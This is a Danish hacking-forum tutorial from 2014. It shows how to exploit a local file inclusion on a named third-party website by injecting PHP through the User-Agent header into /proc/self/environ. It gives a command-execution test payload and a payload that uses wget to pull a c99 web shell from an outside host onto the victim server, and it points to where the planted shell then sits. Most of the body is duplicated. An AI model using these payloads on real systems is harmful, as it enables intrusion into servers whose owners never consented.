18-01-2014, 18:50
Denne guide er en ”efterfølger” på min tidligere guide om lfi via php://input. Derfor vælger jeg at springe en smule af introduktion til lfi + identifikation af lfi-afsnittene over, da der allerede står lidt om det i http://www.shellsec.pw/showthread.php?tid=1368
ligesom i vores sidste øvelse har vi en lille forsøgskanin, som er http://deltabec.name/main.php?include=helena.html
Ligesom sidste gang kan vi hurtigt se, at include-parameteret ”sladrer” om serverens indhold ved brug af /etc/passwd
Og det gør den også ved /proc/self/environ denne gang!
Ligesom sidste gang vælger vi at bruge firefox som browser, og vi skal desuden bruge tamper data-plugin. Hvis I er helt uerfarne med, hvad tamper data bruges til, så kan det anbefales lige at læse på Spagnum's introduktion til det her http://www.shellsec.pw/showthread.php?tid=77
Nu skal vi så prøve at aktivere vores tamper data plugin, hvorefter vi opdateren siden. Læg bla. Mærke til, hvad jeres user agent vil sige
Efter vi prøver at lave tamper data, vil vi prøve at teste for RCE (remote code execution) ligesom sidste gang. Gør som i billedet nedenunder og skriv i UA-feltet <?system('id');?> og tryk på ok. Bagefter vil der komme nogle andre irrelevante ting, som den vil spørge om du vil bruge tamper data på. Ignorer dem og vent til siden loader
Hvis alt er gjort rigtigt, kan vi nu se, at vi kan lave RCE via brugeren vceroot! Til til at shelle nu
For at lægge et shell op på serveren, skal I bare skrive ligesom i sidste vejledning <?system('wget http://www.sh3ll.org/c99.txt -O shell.php');?> eller noget andet, alt efter hvad jeres shell skal hedde :P
Hvis alt er gået som det skulle, har vi nu et c99 shell liggende på http://deltabec.name/shell.php – ligesom sidst, vil jeg gerne bede folk om at lade være med at deface eller andet, da det kun ødelægger formålet med vejledningen, hvis folk defacer og admin patcher fejlen
Håber det var noget folk kunne bruge til noget :)
EDIT: Der lader til at være problemer med billederne, så linker lige til dem her i bunden som et midlertidigt alternativ - de er sorteret i rækkefølge
http://s22.postimg.org/hestu751r/image.png
http://s22.postimg.org/l9w7wro7j/image.png
http://s22.postimg.org/vik3oumvj/image.png
ttp://s22.postimg.org/ojan38cb3/image.png
ligesom i vores sidste øvelse har vi en lille forsøgskanin, som er http://deltabec.name/main.php?include=helena.html
Ligesom sidste gang kan vi hurtigt se, at include-parameteret ”sladrer” om serverens indhold ved brug af /etc/passwd
Og det gør den også ved /proc/self/environ denne gang!
Ligesom sidste gang vælger vi at bruge firefox som browser, og vi skal desuden bruge tamper data-plugin. Hvis I er helt uerfarne med, hvad tamper data bruges til, så kan det anbefales lige at læse på Spagnum's introduktion til det her http://www.shellsec.pw/showthread.php?tid=77
Nu skal vi så prøve at aktivere vores tamper data plugin, hvorefter vi opdateren siden. Læg bla. Mærke til, hvad jeres user agent vil sige
Efter vi prøver at lave tamper data, vil vi prøve at teste for RCE (remote code execution) ligesom sidste gang. Gør som i billedet nedenunder og skriv i UA-feltet <?system('id');?> og tryk på ok. Bagefter vil der komme nogle andre irrelevante ting, som den vil spørge om du vil bruge tamper data på. Ignorer dem og vent til siden loader
Hvis alt er gjort rigtigt, kan vi nu se, at vi kan lave RCE via brugeren vceroot! Til til at shelle nu
For at lægge et shell op på serveren, skal I bare skrive ligesom i sidste vejledning <?system('wget http://www.sh3ll.org/c99.txt -O shell.php');?> eller noget andet, alt efter hvad jeres shell skal hedde :P
Hvis alt er gået som det skulle, har vi nu et c99 shell liggende på http://deltabec.name/shell.php – ligesom sidst, vil jeg gerne bede folk om at lade være med at deface eller andet, da det kun ødelægger formålet med vejledningen, hvis folk defacer og admin patcher fejlen
Håber det var noget folk kunne bruge til noget :)
EDIT: Der lader til at være problemer med billederne, så linker lige til dem her i bunden som et midlertidigt alternativ - de er sorteret i rækkefølge
http://s22.postimg.org/hestu751r/image.png
http://s22.postimg.org/l9w7wro7j/image.png
http://s22.postimg.org/vik3oumvj/image.png
ttp://s22.postimg.org/ojan38cb3/image.png